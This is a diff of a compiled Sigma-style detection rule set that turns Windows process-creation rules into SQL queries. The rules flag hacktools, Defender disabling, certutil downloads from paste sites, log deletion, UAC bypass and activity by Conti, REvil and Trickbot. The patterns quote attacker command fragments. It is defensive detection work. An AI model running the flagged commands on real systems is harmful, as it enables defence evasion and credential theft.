"filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE 